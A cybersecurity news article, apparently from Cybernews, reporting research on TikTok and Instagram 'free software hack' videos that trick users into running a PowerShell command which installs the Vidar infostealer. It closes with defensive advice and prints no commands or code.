Forget phishing emails – cybercriminals are now using viral “hack” tutorials posted on TikTok and Instagram to trick users into downloading malware that can steal your passwords, personal information, and even crypto wallets, new research warns.
-
Hackers are using fake videos on platforms like TikTok and Instagram to trick users into downloading password-stealing malware.
-
Researchers say short-form videos promoting “free Spotify Premium” hacks and Windows tips are replacing traditional phishing email attacks.
-
The campaign highlights how infostealer malware continues fueling account takeovers, fraud, and wider cybercrime operations.
Viral TikTok “hacks” spread malware
The savvy hackers are luring users with short-form videos that promise free software activation and upgrades to popular platforms, including Spotify Premium, Windows, and Microsoft Office products such as Word and Adobe Premiere, according to a new blog by ReversingLabs.
“Primarily conducted on TikTok and Instagram Reels, these campaigns use the same template to mass-produce videos and make regular posts,” said Zaria Vuksan, threat intel researcher at ReversingLabs.
Researchers say they uncovered two distinct content-fueled phishing campaigns utilizing short-form “tutorial hack” videos across multiple social media platforms – all of them leading to a secondary website hosting the “free software.”
“Either approach is a means to a different end, and the differences demonstrate how attackers can leverage different aspects of social media engagement to reach more potential victims,” Vuksan said.
Password-stealing malware hides in fake downloads
The first method is fairly straightforward. The attackers create polished-looking videos, complete with professional-sounding voice-overs and clean graphics, and repeatedly post them on platforms using multiple accounts.
For the Microsoft-themed scams, researchers found the nefarious accounts using official Windows logos and profile handles such as "windows.tips" or “window.insight” to build credibility.
@spotify.free.premium premium spotify free
♬ sonido original - Spotify free premium
Many of the accounts and videos also included descriptions and keyword hashtags to make them appear to resemble authentic customer-support pages.
One of the fraudulent videos ReversingLabs identified had racked up more than 100,000 views and thousands of interactions, making it more “algorithmically valuable” and likely to show up on user feeds.
Once hooked, victims are instructed to copy and paste a specific command into Windows PowerShell, claiming it will activate the premium features.
“The video is short and to the point, showing users step-by-step how to access PowerShell from the Windows menu and what command to input to supposedly unlock this free service,” the blog states.
Vuksan says non-technical users often do not know any better and may assume the command-line instructions are legitimate. “Attackers are relying on this lack of understanding,” she adds.
Next, the PowerShell command triggers the payload, downloading the powerful Vidar infostealer directly onto the victim’s device.
@windows.tips1 🧠 Many users don’t notice why Windows doesn’t feel complete #windows #windows10 #windows11 #pctips #techtok ♬ original sound - Windows Tips
Engagement bait turns curiosity into clicks
The second phishing lure uses engagement bait, often showing someone scrolling through premium software features they claim to have unlocked for free.
For example, the videos often look like ordinary user posts, set to trending music, while falsely claiming users can get Spotify Premium for free. They also often span multiple videos.
The goal is to spark comments from curious viewers asking how they did it – giving attackers a chance to reply with instructions, links, or follow-up videos that point to malicious sites.
Vuksan says the strategy helps boost engagement and build trust with followers before directing them to carry out the malicious instructions.
The hook is introduced only after the profile starts to gain traction on TikTok or Instagram.
The researchers, who tried to report the content and were rejected, also note that social media videos can be difficult to defend against.
“Users who catch onto the malicious intent, either through research or falling for it themselves, may try to warn others in the comments. However, most platforms allow creators to delete comments and block commenters,” they said.
How to avoid fake “free software” scams
Malwarebytes, which wrote its own blog on the RerversingLabs research, says the potent Vidar Infostealer silently exfiltrates sensitive data from infected devices, including:
- Browser data – Saved passwords, cookies, autofill information, and some two-factor authentication data.
- System info – Information about the infected device and installed software.
- Login credentials – Usernames and passwords for other installed applications and services.
- Crypto wallets – Private keys and wallet data for various cryptocurrencies
The Vidar malware, first seen in 2018, is designed to steal information and then send it back to servers controlled by the attackers.
Malwarebytes says that to avoid PowerShell hacks, users should never run commands in PowerShell or Terminal from untrusted sources.
The researchers also recommend being skeptical of social media "tips" in general, as even verified-looking handles can still distribute malware and to always use official channels, such as apps and websites, when subscribing to streaming services or downloading software.
Finally, they urge users to always use “real-time, up-to-date anti-malware programs” to block malware and infostealers before they run.
Check if your data has been leaked
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked